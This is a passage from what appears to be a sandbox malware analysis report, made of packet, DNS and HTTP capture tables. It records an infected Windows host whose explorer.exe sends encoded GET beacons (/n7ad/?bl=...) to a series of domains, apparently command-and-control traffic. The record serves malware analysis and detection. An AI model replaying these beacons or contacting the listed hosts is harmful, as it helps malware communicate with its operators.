May 3, 2021 16:51:38.629160881 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.629354954 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.629651070 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.670553923 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.766555071 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.766638041 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.766936064 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.768503904 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.809364080 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:49.136158943 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.180980921 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.181178093 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.181248903 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.226030111 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.240447044 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.240470886 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.240613937 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.240660906 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.285420895 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:59.460664988 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.514575005 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.514744997 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.515070915 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.568831921 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.569699049 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.569724083 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.569962978 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.570087910 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.623846054 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:52:04.827341080 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:04.990329981 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:04.990514994 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:04.990890026 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:05.153763056 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:05.163970947 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:05.163997889 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:05.164314985 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:05.164418936 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:05.327270985 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:15.364093065 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.430095911 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.430296898 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.430581093 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.496320009 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.504179001 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.504198074 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.504400969 CEST	49754	80	192.168.2.3	46.30.211.38

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 16:50:08.811388969 CEST	49199	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:08.869915009 CEST	53	49199	8.8.8.8	192.168.2.3
May 3, 2021 16:50:09.509768963 CEST	50620	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:09.574763060 CEST	53	50620	8.8.8.8	192.168.2.3
May 3, 2021 16:50:13.393687963 CEST	64938	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:13.445195913 CEST	53	64938	8.8.8.8	192.168.2.3
May 3, 2021 16:50:16.809784889 CEST	60152	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:16.861000061 CEST	53	60152	8.8.8.8	192.168.2.3
May 3, 2021 16:50:17.378694057 CEST	57544	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:17.435731888 CEST	53	57544	8.8.8.8	192.168.2.3
May 3, 2021 16:50:17.628050089 CEST	55984	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:17.676754951 CEST	53	55984	8.8.8.8	192.168.2.3
May 3, 2021 16:50:18.627727032 CEST	64185	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:18.679233074 CEST	53	64185	8.8.8.8	192.168.2.3
May 3, 2021 16:50:19.724458933 CEST	65110	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:19.774852991 CEST	53	65110	8.8.8.8	192.168.2.3
May 3, 2021 16:50:21.362386942 CEST	58361	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:21.411184072 CEST	53	58361	8.8.8.8	192.168.2.3
May 3, 2021 16:50:22.225343943 CEST	63492	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:22.274000883 CEST	53	63492	8.8.8.8	192.168.2.3
May 3, 2021 16:50:23.158615112 CEST	60831	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:23.217219114 CEST	53	60831	8.8.8.8	192.168.2.3
May 3, 2021 16:50:24.119350910 CEST	60100	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:24.170926094 CEST	53	60100	8.8.8.8	192.168.2.3
May 3, 2021 16:50:24.901106119 CEST	53195	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:24.951069117 CEST	53	53195	8.8.8.8	192.168.2.3
May 3, 2021 16:50:25.677542925 CEST	50141	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:25.731005907 CEST	53	50141	8.8.8.8	192.168.2.3
May 3, 2021 16:50:26.809788942 CEST	53023	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:26.858412027 CEST	53	53023	8.8.8.8	192.168.2.3
May 3, 2021 16:50:27.612881899 CEST	49563	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:27.664334059 CEST	53	49563	8.8.8.8	192.168.2.3
May 3, 2021 16:50:28.422533989 CEST	51352	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:28.473973036 CEST	53	51352	8.8.8.8	192.168.2.3
May 3, 2021 16:50:29.377460003 CEST	59349	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:29.426270962 CEST	53	59349	8.8.8.8	192.168.2.3
May 3, 2021 16:50:32.246200085 CEST	57084	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:32.303208113 CEST	53	57084	8.8.8.8	192.168.2.3
May 3, 2021 16:50:33.522645950 CEST	58823	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:33.571369886 CEST	53	58823	8.8.8.8	192.168.2.3
May 3, 2021 16:50:34.363800049 CEST	57568	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:34.412540913 CEST	53	57568	8.8.8.8	192.168.2.3
May 3, 2021 16:50:37.427102089 CEST	50540	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:37.475810051 CEST	53	50540	8.8.8.8	192.168.2.3
May 3, 2021 16:50:38.024178982 CEST	54366	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:38.085119963 CEST	53	54366	8.8.8.8	192.168.2.3
May 3, 2021 16:50:53.407485008 CEST	53034	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:53.459784031 CEST	53	53034	8.8.8.8	192.168.2.3
May 3, 2021 16:51:01.768326998 CEST	57762	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:01.833236933 CEST	53	57762	8.8.8.8	192.168.2.3
May 3, 2021 16:51:02.705568075 CEST	55435	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:02.754239082 CEST	53	55435	8.8.8.8	192.168.2.3
May 3, 2021 16:51:03.928236961 CEST	50713	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:03.976876020 CEST	53	50713	8.8.8.8	192.168.2.3
May 3, 2021 16:51:12.193563938 CEST	56132	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:12.267481089 CEST	53	56132	8.8.8.8	192.168.2.3
May 3, 2021 16:51:17.476492882 CEST	58987	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:17.542897940 CEST	53	58987	8.8.8.8	192.168.2.3
May 3, 2021 16:51:19.451631069 CEST	56579	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:19.511034966 CEST	53	56579	8.8.8.8	192.168.2.3
May 3, 2021 16:51:21.929121971 CEST	60633	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:21.986923933 CEST	53	60633	8.8.8.8	192.168.2.3
May 3, 2021 16:51:22.741216898 CEST	61292	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:22.925550938 CEST	53	61292	8.8.8.8	192.168.2.3
May 3, 2021 16:51:27.943416119 CEST	63619	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:28.005670071 CEST	53	63619	8.8.8.8	192.168.2.3
May 3, 2021 16:51:33.235909939 CEST	64938	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:33.305274963 CEST	53	64938	8.8.8.8	192.168.2.3
May 3, 2021 16:51:38.509706020 CEST	61946	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:38.584916115 CEST	53	61946	8.8.8.8	192.168.2.3
May 3, 2021 16:51:43.773622036 CEST	64910	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:44.020522118 CEST	53	64910	8.8.8.8	192.168.2.3
May 3, 2021 16:51:49.062645912 CEST	52123	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:49.135061979 CEST	53	52123	8.8.8.8	192.168.2.3
May 3, 2021 16:51:49.520376921 CEST	56130	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:49.570616961 CEST	53	56130	8.8.8.8	192.168.2.3
May 3, 2021 16:51:49.993237019 CEST	56338	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:50.058635950 CEST	53	56338	8.8.8.8	192.168.2.3
May 3, 2021 16:51:54.263361931 CEST	59420	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:54.351383924 CEST	53	59420	8.8.8.8	192.168.2.3
May 3, 2021 16:51:59.368172884 CEST	58784	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:59.459358931 CEST	53	58784	8.8.8.8	192.168.2.3
May 3, 2021 16:52:04.634169102 CEST	63978	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:04.821580887 CEST	53	63978	8.8.8.8	192.168.2.3
May 3, 2021 16:52:10.187788010 CEST	62938	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:10.266602039 CEST	53	62938	8.8.8.8	192.168.2.3
May 3, 2021 16:52:10.921250105 CEST	55708	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:10.969866037 CEST	53	55708	8.8.8.8	192.168.2.3
May 3, 2021 16:52:15.277559042 CEST	56803	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:15.361716986 CEST	53	56803	8.8.8.8	192.168.2.3
May 3, 2021 16:52:20.514333963 CEST	57145	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:20.917326927 CEST	53	57145	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 3, 2021 16:51:01.768326998 CEST	192.168.2.3	8.8.8.8	0x5dc8	Standard query (0)	www.sloanksmith.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:12.193563938 CEST	192.168.2.3	8.8.8.8	0x5a3b	Standard query (0)	www.letsratethis.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:17.476492882 CEST	192.168.2.3	8.8.8.8	0xaab7	Standard query (0)	www.cannabisllp.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:22.741216898 CEST	192.168.2.3	8.8.8.8	0xe56e	Standard query (0)	www.bestsellerselect.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:27.943416119 CEST	192.168.2.3	8.8.8.8	0xd696	Standard query (0)	www.buffalobooze.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:33.235909939 CEST	192.168.2.3	8.8.8.8	0xb2a6	Standard query (0)	www.checkmytradesmanswork.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:38.509706020 CEST	192.168.2.3	8.8.8.8	0x3ee5	Standard query (0)	www.inthebeginningshop.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:43.773622036 CEST	192.168.2.3	8.8.8.8	0xa742	Standard query (0)	www.shop-daily.info	A (IP address)	IN (0x0001)
May 3, 2021 16:51:49.062645912 CEST	192.168.2.3	8.8.8.8	0x9c89	Standard query (0)	www.madisonroselove.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:54.263361931 CEST	192.168.2.3	8.8.8.8	0x910	Standard query (0)	www.colabchat.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:59.368172884 CEST	192.168.2.3	8.8.8.8	0xe563	Standard query (0)	www.pedroiniesta.net	A (IP address)	IN (0x0001)
May 3, 2021 16:52:04.634169102 CEST	192.168.2.3	8.8.8.8	0x8eeb	Standard query (0)	www.freecleanlimpieza.com	A (IP address)	IN (0x0001)
May 3, 2021 16:52:10.187788010 CEST	192.168.2.3	8.8.8.8	0x7e98	Standard query (0)	www.zryld.com	A (IP address)	IN (0x0001)
May 3, 2021 16:52:15.277559042 CEST	192.168.2.3	8.8.8.8	0xc201	Standard query (0)	www.graet.design	A (IP address)	IN (0x0001)
May 3, 2021 16:52:20.514333963 CEST	192.168.2.3	8.8.8.8	0xa1c6	Standard query (0)	www.xoyicgv.icu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 3, 2021 16:51:01.833236933 CEST	8.8.8.8	192.168.2.3	0x5dc8	No error (0)	www.sloanksmith.com		74.208.236.36	A (IP address)	IN (0x0001)
May 3, 2021 16:51:12.267481089 CEST	8.8.8.8	192.168.2.3	0x5a3b	No error (0)	www.letsratethis.com	letsratethis.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:12.267481089 CEST	8.8.8.8	192.168.2.3	0x5a3b	No error (0)	letsratethis.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:17.542897940 CEST	8.8.8.8	192.168.2.3	0xaab7	No error (0)	www.cannabisllp.com	cannabisllp.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:17.542897940 CEST	8.8.8.8	192.168.2.3	0xaab7	No error (0)	cannabisllp.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:22.925550938 CEST	8.8.8.8	192.168.2.3	0xe56e	Server failure (2)	www.bestsellerselect.com	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:51:28.005670071 CEST	8.8.8.8	192.168.2.3	0xd696	No error (0)	www.buffalobooze.com	buffalobooze.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:28.005670071 CEST	8.8.8.8	192.168.2.3	0xd696	No error (0)	buffalobooze.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:33.305274963 CEST	8.8.8.8	192.168.2.3	0xb2a6	No error (0)	www.checkmytradesmanswork.com	checkmytradesmanswork.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:33.305274963 CEST	8.8.8.8	192.168.2.3	0xb2a6	No error (0)	checkmytradesmanswork.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:38.584916115 CEST	8.8.8.8	192.168.2.3	0x3ee5	No error (0)	www.inthebeginningshop.com	inthebeginningshop.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:38.584916115 CEST	8.8.8.8	192.168.2.3	0x3ee5	No error (0)	inthebeginningshop.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:44.020522118 CEST	8.8.8.8	192.168.2.3	0xa742	Server failure (2)	www.shop-daily.info	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:51:49.135061979 CEST	8.8.8.8	192.168.2.3	0x9c89	No error (0)	www.madisonroselove.com		81.17.18.196	A (IP address)	IN (0x0001)
May 3, 2021 16:51:54.351383924 CEST	8.8.8.8	192.168.2.3	0x910	Name error (3)	www.colabchat.com	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:51:59.459358931 CEST	8.8.8.8	192.168.2.3	0xe563	No error (0)	www.pedroiniesta.net		206.189.50.215	A (IP address)	IN (0x0001)
May 3, 2021 16:51:59.459358931 CEST	8.8.8.8	192.168.2.3	0xe563	No error (0)	www.pedroiniesta.net		3.125.252.47	A (IP address)	IN (0x0001)
May 3, 2021 16:52:04.821580887 CEST	8.8.8.8	192.168.2.3	0x8eeb	No error (0)	www.freecleanlimpieza.com	freecleanlimpieza.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:52:04.821580887 CEST	8.8.8.8	192.168.2.3	0x8eeb	No error (0)	freecleanlimpieza.com		192.185.131.134	A (IP address)	IN (0x0001)
May 3, 2021 16:52:10.266602039 CEST	8.8.8.8	192.168.2.3	0x7e98	Name error (3)	www.zryld.com	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:52:15.361716986 CEST	8.8.8.8	192.168.2.3	0xc201	No error (0)	www.graet.design		46.30.211.38	A (IP address)	IN (0x0001)
May 3, 2021 16:52:20.917326927 CEST	8.8.8.8	192.168.2.3	0xa1c6	Name error (3)	www.xoyicgv.icu	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.sloanksmith.com

www.letsratethis.com

www.cannabisllp.com

www.buffalobooze.com

www.checkmytradesmanswork.com

www.inthebeginningshop.com

www.madisonroselove.com

www.pedroiniesta.net

www.freecleanlimpieza.com

www.graet.design

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49734	74.208.236.36	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:01.999663115 CEST	1663	OUT	GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1 Host: www.sloanksmith.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:02.166860104 CEST	1664	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Mon, 03 May 2021 14:51:02 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49737	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:12.309696913 CEST	1732	OUT	GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1 Host: www.letsratethis.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:12.447180033 CEST	1732	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:12 GMT Content-Type: text/html Content-Length: 275 ETag: "6089cf31-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49755	74.208.236.36	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:52:26.091522932 CEST	9275	OUT	GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1 Host: www.sloanksmith.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:52:26.259051085 CEST	9276	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Mon, 03 May 2021 14:52:26 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 